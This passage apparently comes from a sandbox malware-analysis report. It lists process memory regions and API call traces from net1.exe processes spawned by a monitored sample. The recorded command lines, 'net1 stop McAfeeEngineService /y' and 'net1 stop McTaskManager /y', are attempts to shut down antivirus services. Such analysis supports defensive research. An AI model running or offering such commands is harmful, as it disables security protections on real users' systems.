"netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6336 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6337 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6338 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6339 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6340 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6341 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6342 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6343 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6344 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6345 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 559 os_tid = 0x1134 [0099.270] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fa90 | out: lpSystemTimeAsFileTime=0x14fa90*(dwLowDateTime=0xf056d110, dwHighDateTime=0x1d48689)) [0099.270] GetCurrentProcessId () returned 0x1158 [0099.270] GetCurrentThreadId () returned 0x1134 [0099.270] GetTickCount () returned 0x229ae [0099.270] QueryPerformanceCounter (in: lpPerformanceCount=0x14fa98 | out: lpPerformanceCount=0x14fa98*=1814618800000) returned 1 [0099.272] GetModuleHandleW (lpModuleName=0x0) returned 0xff660000 [0099.272] __set_app_type (_Type=0x1) [0099.272] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff679c9c) returned 0x0 [0099.272] __getmainargs (in: _Argc=0xff684780, _Argv=0xff684790, _Env=0xff684788, _DoWildCard=0, _StartInfo=0xff68479c | out: _Argc=0xff684780, _Argv=0xff684790, _Env=0xff684788) returned 0 [0099.272] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.272] GetConsoleOutputCP () returned 0x1b5 [0099.272] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff68cec0 | out: lpCPInfo=0xff68cec0) returned 1 [0099.272] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0099.274] sprintf_s (in: _DstBuf=0x14fa38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0099.274] setlocale (category=0, locale=".437") returned="English_United States.437" [0099.276] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0099.276] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0099.276] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeEngineService /y" [0099.276] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f7d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0099.276] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0099.276] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14fa28 | out: Buffer=0x14fa28*=0x204d60) returned 0x0 [0099.276] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x14fa28 | out: Buffer=0x14fa28*=0x20c130) returned 0x0 [0099.276] _fileno (_File=0x7fefdba2a80) returned 0 [0099.276] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0099.277] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0099.277] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0099.277] _wcsicmp (_String1="config", _String2="stop") returned -16 [0099.277] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0099.277] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0099.277] _wcsicmp (_String1="file", _String2="stop") returned -13 [0099.277] _wcsicmp (_String1="files", _String2="stop") returned -13 [0099.277] _wcsicmp (_String1="group", _String2="stop") returned -12 [0099.277] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0099.277] _wcsicmp (_String1="help", _String2="stop") returned -11 [0099.277] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0099.277] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0099.277] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0099.277] _wcsicmp (_String1="session", _String2="stop") returned -15 [0099.277] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0099.277] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0099.277] _wcsicmp (_String1="share", _String2="stop") returned -12 [0099.277] _wcsicmp (_String1="start", _String2="stop") returned -14 [0099.278] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0099.278] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0099.278] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0099.278] _wcsicmp (_String1="accounts", _String2="McAfeeEngineService") returned -12 [0099.278] _wcsicmp (_String1="computer", _String2="McAfeeEngineService") returned -10 [0099.278] _wcsicmp (_String1="config", _String2="McAfeeEngineService") returned -10 [0099.278] _wcsicmp (_String1="continue", _String2="McAfeeEngineService") returned -10 [0099.278] _wcsicmp (_String1="cont", _String2="McAfeeEngineService") returned -10 [0099.278] _wcsicmp (_String1="file", _String2="McAfeeEngineService") returned -7 [0099.278] _wcsicmp (_String1="files", _String2="McAfeeEngineService") returned -7 [0099.278] _wcsicmp (_String1="group", _String2="McAfeeEngineService") returned -6 [0099.278] _wcsicmp (_String1="groups", _String2="McAfeeEngineService") returned -6 [0099.278] _wcsicmp (_String1="help", _String2="McAfeeEngineService") returned -5 [0099.278] _wcsicmp (_String1="helpmsg", _String2="McAfeeEngineService") returned -5 [0099.278] _wcsicmp (_String1="localgroup", _String2="McAfeeEngineService") returned -1 [0099.278] _wcsicmp (_String1="pause", _String2="McAfeeEngineService") returned 3 [0099.278] _wcsicmp (_String1="session", _String2="McAfeeEngineService") returned 6 [0099.278] _wcsicmp (_String1="sessions", _String2="McAfeeEngineService") returned 6 [0099.278] _wcsicmp (_String1="sess", _String2="McAfeeEngineService") returned 6 [0099.279] _wcsicmp (_String1="share", _String2="McAfeeEngineService") returned 6 [0099.279] _wcsicmp (_String1="start", _String2="McAfeeEngineService") returned 6 [0099.279] _wcsicmp (_String1="stats", _String2="McAfeeEngineService") returned 6 [0099.279] _wcsicmp (_String1="statistics", _String2="McAfeeEngineService") returned 6 [0099.279] _wcsicmp (_String1="stop", _String2="McAfeeEngineService") returned 6 [0099.279] _wcsicmp (_String1="time", _String2="McAfeeEngineService") returned 7 [0099.279] _wcsicmp (_String1="user", _String2="McAfeeEngineService") returned 8 [0099.279] _wcsicmp (_String1="users", _String2="McAfeeEngineService") returned 8 [0099.279] _wcsicmp (_String1="msg", _String2="McAfeeEngineService") returned 16 [0099.279] _wcsicmp (_String1="messenger", _String2="McAfeeEngineService") returned 2 [0099.279] _wcsicmp (_String1="receiver", _String2="McAfeeEngineService") returned 5 [0099.279] _wcsicmp (_String1="rcv", _String2="McAfeeEngineService") returned 5 [0099.279] _wcsicmp (_String1="netpopup", _String2="McAfeeEngineService") returned 1 [0099.279] _wcsicmp (_String1="redirector", _String2="McAfeeEngineService") returned 5 [0099.279] _wcsicmp (_String1="redir", _String2="McAfeeEngineService") returned 5 [0099.279] _wcsicmp (_String1="rdr", _String2="McAfeeEngineService") returned 5 [0099.279] _wcsicmp (_String1="workstation", _String2="McAfeeEngineService") returned 10 [0099.279] _wcsicmp (_String1="work", _String2="McAfeeEngineService") returned 10 [0099.279] _wcsicmp (_String1="wksta", _String2="McAfeeEngineService") returned 10 [0099.279] _wcsicmp (_String1="prdr", _String2="McAfeeEngineService") returned 3 [0099.279] _wcsicmp (_String1="devrdr", _String2="McAfeeEngineService") returned -9 [0099.280] _wcsicmp (_String1="lanmanworkstation", _String2="McAfeeEngineService") returned -1 [0099.280] _wcsicmp (_String1="server", _String2="McAfeeEngineService") returned 6 [0099.280] _wcsicmp (_String1="svr", _String2="McAfeeEngineService") returned 6 [0099.280] _wcsicmp (_String1="srv", _String2="McAfeeEngineService") returned 6 [0099.280] _wcsicmp (_String1="lanmanserver", _String2="McAfeeEngineService") returned -1 [0099.280] _wcsicmp (_String1="alerter", _String2="McAfeeEngineService") returned -12 [0099.280] _wcsicmp (_String1="netlogon", _String2="McAfeeEngineService") returned 1 [0099.280] _wcsupr (in: _String="McAfeeEngineService" | out: _String="MCAFEEENGINESERVICE") returned="MCAFEEENGINESERVICE" [0099.280] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x20ce40 [0099.284] GetServiceKeyNameW (in: hSCManager=0x20ce40, lpDisplayName="MCAFEEENGINESERVICE", lpServiceName=0xff685750, lpcchBuffer=0x14f948 | out: lpServiceName="", lpcchBuffer=0x14f948) returned 0 [0099.290] _wcsicmp (_String1="msg", _String2="MCAFEEENGINESERVICE") returned 16 [0099.290] _wcsicmp (_String1="messenger", _String2="MCAFEEENGINESERVICE") returned 2 [0099.290] _wcsicmp (_String1="receiver", _String2="MCAFEEENGINESERVICE") returned 5 [0099.290] _wcsicmp (_String1="rcv", _String2="MCAFEEENGINESERVICE") returned 5 [0099.290] _wcsicmp (_String1="redirector", _String2="MCAFEEENGINESERVICE") returned 5 [0099.290] _wcsicmp (_String1="redir", _String2="MCAFEEENGINESERVICE") returned 5 [0099.291] _wcsicmp (_String1="rdr", _String2="MCAFEEENGINESERVICE") returned 5 [0099.291] _wcsicmp (_String1="workstation", _String2="MCAFEEENGINESERVICE") returned 10 [0099.291] _wcsicmp (_String1="work", _String2="MCAFEEENGINESERVICE") returned 10 [0099.291] _wcsicmp (_String1="wksta", _String2="MCAFEEENGINESERVICE") returned 10 [0099.291] _wcsicmp (_String1="prdr", _String2="MCAFEEENGINESERVICE") returned 3 [0099.291] _wcsicmp (_String1="devrdr", _String2="MCAFEEENGINESERVICE") returned -9 [0099.291] _wcsicmp (_String1="lanmanworkstation", _String2="MCAFEEENGINESERVICE") returned -1 [0099.291] _wcsicmp (_String1="server", _String2="MCAFEEENGINESERVICE") returned 6 [0099.291] _wcsicmp (_String1="svr", _String2="MCAFEEENGINESERVICE") returned 6 [0099.291] _wcsicmp (_String1="srv", _String2="MCAFEEENGINESERVICE") returned 6 [0099.291] _wcsicmp (_String1="lanmanserver", _String2="MCAFEEENGINESERVICE") returned -1 [0099.291] _wcsicmp (_String1="alerter", _String2="MCAFEEENGINESERVICE") returned -12 [0099.291] _wcsicmp (_String1="netlogon", _String2="MCAFEEENGINESERVICE") returned 1 [0099.291] NetServiceControl (in: servername=0x0, service="MCAFEEENGINESERVICE", opcode=0x0, arg=0x0, bufptr=0x14f950 | out: bufptr=0x14f950) returned 0x889 [0099.292] wcscpy_s (in: _Destination=0xff6880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0099.292] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0099.294] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff685b50, nSize=0x800, Arguments=0xff687f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0099.295] GetFileType (hFile=0xb) returned 0x2 [0099.296] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f818 | out: lpMode=0x14f818) returned 1 [0099.296] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff685b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x14f810, lpReserved=0x0 | out: lpBuffer=0xff685b50*, lpNumberOfCharsWritten=0x14f810*=0x1e) returned 1 [0099.296] GetFileType (hFile=0xb) returned 0x2 [0099.296] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f818 | out: lpMode=0x14f818) returned 1 [0099.297] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff661efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f810, lpReserved=0x0 | out: lpBuffer=0xff661efc*, lpNumberOfCharsWritten=0x14f810*=0x2) returned 1 [0099.297] _ultow (in: _Dest=0x889, _Radix=1374336 | out: _Dest=0x889) returned="2185" [0099.297] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff685b50, nSize=0x800, Arguments=0xff687f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0099.297] GetFileType (hFile=0xb) returned 0x2 [0099.297] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f818 | out: lpMode=0x14f818) returned 1 [0099.298] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff685b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14f810, lpReserved=0x0 | out: lpBuffer=0xff685b50*, lpNumberOfCharsWritten=0x14f810*=0x34) returned 1 [0099.298] GetFileType (hFile=0xb) returned 0x2 [0099.298] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14f818 | out: lpMode=0x14f818) returned 1 [0099.326] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff661efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f810, lpReserved=0x0 | out: lpBuffer=0xff661efc*, lpNumberOfCharsWritten=0x14f810*=0x2) returned 1 [0099.326] NetApiBufferFree (Buffer=0x204d60) returned 0x0 [0099.326] NetApiBufferFree (Buffer=0x20c130) returned 0x0 [0099.326] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeEngineService /y" [0099.326] exit (_Code=2) Process: id = "140" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x60a8f000" os_pid = "0x10bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "136" os_parent_pid = "0x112c" cmd_line = "C:\\Windows\\system32\\net1 stop McTaskManager /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6268 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6269 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6270 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6271 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 6272 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6273 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6274 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6275 start_va = 0xff660000 end_va = 0xff692fff entry_point = 0xff660000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6276 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6277 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6278 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 6279 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 6280 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 6281 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6282 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6283 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6284 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6285 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6286 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 6287 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6288 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6289 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6290 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 6291 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6292 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6293 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6294 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6295 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6296 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6297 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6298 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6299 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6300 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6301 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6302 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6303 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6304 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6305 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6346 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 560 os_tid = 0x1160 [0099.228] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f910 | out: lpSystemTimeAsFileTime=0x26f910*(dwLowDateTime=0xf04facf0, dwHighDateTime=0x1d48689)) [0099.228] GetCurrentProcessId () returned 0x10bc [0099.228] GetCurrentThreadId () returned 0x1160 [0099.228] GetTickCount () returned 0x2297f [0099.228] QueryPerformanceCounter (in: lpPerformanceCount=0x26f918 | out: lpPerformanceCount=0x26f918*=1814614600000) returned 1 [0099.230] GetModuleHandleW (lpModuleName=0x0) returned 0xff660000 [0099.230] __set_app_type (_Type=0x1) [0099.230] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff679c9c) returned 0x0 [0099.230] __getmainargs (in: _Argc=0xff684780, _Argv=0xff684790, _Env=0xff684788, _DoWildCard=0, _StartInfo=0xff68479c | out: _Argc=0xff684780, _Argv=0xff684790, _Env=0xff684788) returned 0 [0099.230] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.230] GetConsoleOutputCP () returned 0x1b5 [0099.298] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff68cec0 | out: lpCPInfo=0xff68cec0) returned 1 [0099.299] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0099.301] sprintf_s (in: _DstBuf=0x26f8b8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0099.301] setlocale (category=0, locale=".437") returned="English_United States.437" [0099.302] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0099.302] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0099.302] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McTaskManager /y" [0099.303] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26f650, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0099.303] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0099.303] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26f8a8 | out: Buffer=0x26f8a8*=0x64d50) returned 0x0 [0099.303] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26f8a8 | out: Buffer=0x26f8a8*=0x6c100) returned 0x0 [0099.303] _fileno (_File=0x7fefdba2a80) returned 0 [0099.303] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0099.303] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0099.303] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0099.303] _wcsicmp (_String1="config", _String2="stop") returned -16 [0099.303] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0099.303] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0099.304] _wcsicmp (_String1="file", _String2="stop") returned -13 [0099.304] _wcsicmp (_String1="files", _String2="stop") returned -13 [0099.304] _wcsicmp (_String1="group", _String2="stop") returned -12 [0099.304] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0099.304] _wcsicmp (_String1="help", _String2="stop") returned -11 [0099.304] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0099.304] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0099.304] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0099.304] _wcsicmp (_String1="session", _String2="stop") returned -15 [0099.304] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0099.304] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0099.304] _wcsicmp (_String1="share", _String2="stop") returned -12 [0099.304] _wcsicmp (_String1="start", _String2="stop") returned -14 [0099.304] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0099.304] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0099.304] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0099.304] _wcsicmp (_String1="accounts", _String2="McTaskManager") returned -12 [0099.304] _wcsicmp (_String1="computer", _String2="McTaskManager") returned -10 [0099.304] _wcsicmp (_String1="config", _String2="McTaskManager") returned -10 [0099.304] _wcsicmp (_String1="continue", _String2="McTaskManager") returned -10 [0099.305] _wcsicmp (_String1="cont", _String2="McTaskManager") returned -10 [0099.305] _wcsicmp (_String1="file", _String2="McTaskManager") returned -7 [0099.305] _wcsicmp (_String1="files", _String2="McTaskManager") returned -7 [0099.305] _wcsicmp (_String1="group", _String2="McTaskManager") returned -6 [0099.305] _wcsicmp (_String1="groups", _String2="McTaskManager") returned -6 [0099.305] _wcsicmp (_String1="help", _String2="McTaskManager") returned -5 [0099.305] _wcsicmp (_String1="helpmsg", _String2="McTaskManager") returned -5 [0099.305] _wcsicmp (_String1="localgroup", _String2="McTaskManager") returned -1 [0099.305] _wcsicmp (_String1="pause", _String2="McTaskManager") returned 3 [0099.305] _wcsicmp (_String1="session", _String2="McTaskManager") returned 6 [0099.305] _wcsicmp (_String1="sessions", _String2="McTaskManager") returned 6 [0099.305] _wcsicmp (_String1="sess", _String2="McTaskManager") returned 6 [0099.305] _wcsicmp (_String1="share", _String2="McTaskManager") returned 6 [0099.305] _wcsicmp (_String1="start", _String2="McTaskManager") returned 6 [0099.305] _wcsicmp (_String1="stats", _String2="McTaskManager") returned 6 [0099.305] _wcsicmp (_String1="statistics", _String2="McTaskManager") returned 6 [0099.305] _wcsicmp (_String1="stop", _String2="McTaskManager") returned 6 [0099.305] _wcsicmp (_String1="time", _String2="McTaskManager") returned 7 [0099.305] _wcsicmp (_String1="user", _String2="McTaskManager") returned 8 [0099.305] _wcsicmp (_String1="users", _String2="McTaskManager") returned 8 [0099.305] _wcsicmp (_String1="msg", _String2="McTaskManager") returned 16 [0099.306] _wcsicmp (_String1="messenger", _String2="McTaskManager") returned 2 [0099.306] _wcsicmp (_String1="receiver", 